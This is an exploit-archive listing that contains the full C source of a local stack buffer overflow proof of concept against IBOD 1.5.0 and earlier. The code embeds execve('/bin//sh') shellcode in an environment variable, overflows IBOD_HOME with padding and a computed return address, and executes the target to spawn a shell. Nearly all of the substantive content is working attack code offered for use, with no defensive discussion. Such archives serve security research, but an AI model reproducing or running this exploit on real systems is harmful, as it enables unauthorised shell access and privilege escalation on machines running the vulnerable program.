what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

ibod_bof.c

ibod_bof.c
Posted Dec 31, 2004
Authored by CoKi | Site nosystem.com.ar

IBOD 1.5.0 and below local proof of concept buffer overflow exploit.

tags | exploit, overflow, local, proof of concept
SHA-256 | 9a604874ed4c3a5442bb00dbf27ccce5d305c9bfed784c062e3cd4b3737e97fb

ibod_bof.c

Change Mirror Download
/* ibod_bof.c
*
* IBOD <= 1.5.0 local buffer overflow exploit (Proof of Concept)
*
* Tested in Slackware Linux 10.0
*
* by CoKi <coki@nosystem.com.ar>
* No System Group - http://www.nosystem.com.ar
*/

#include <stdio.h>
#include <strings.h>

#define BUFFER 540 + 4

char shellcode[]=
"\x31\xc0" /* xor %eax,%eax */
"\x31\xd2" /* xor %edx,%edx */
"\x52" /* push %edx */
"\x68\x2f\x2f\x73\x68" /* push $0x68732f2f */
"\x68\x2f\x62\x69\x6e" /* push $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x52" /* push %edx */
"\x53" /* push %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\xb0\x0b" /* mov $0xb,%al */
"\xcd\x80"; /* int $0x80 */

void use(char *program);

int main(int argc, char *argv[]) {

FILE *file;
char buf[BUFFER], *path, tmp[BUFFER];
char *buffer=buf;
int ret;

if(argc != 2) use(argv[0]);

path = argv[1];

if((file = fopen(path, "r")) == NULL) {
printf(" Failed to open file!\n");
exit(1);
}

ret = 0xbffffffa - strlen(shellcode) - strlen(path);

bzero(buf, sizeof(buf));
memset(buffer, 'A', BUFFER-4);

sprintf(tmp, "%s", &ret);
strncat(buf, tmp, 4);

printf("\n ibod <= 1.5.0 local stack buffer overflow (Proof of Concept)\n");
printf(" by CoKi <coki@nosystem.com.ar>\n\n");

setenv("IBOD_HOME", buf, 1);
setenv("SHELLCODE", shellcode, 1);

execl(path, path, NULL);

}

void use(char *program) {
printf(" Use: %s <path>\n", program);
exit(1);
}
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close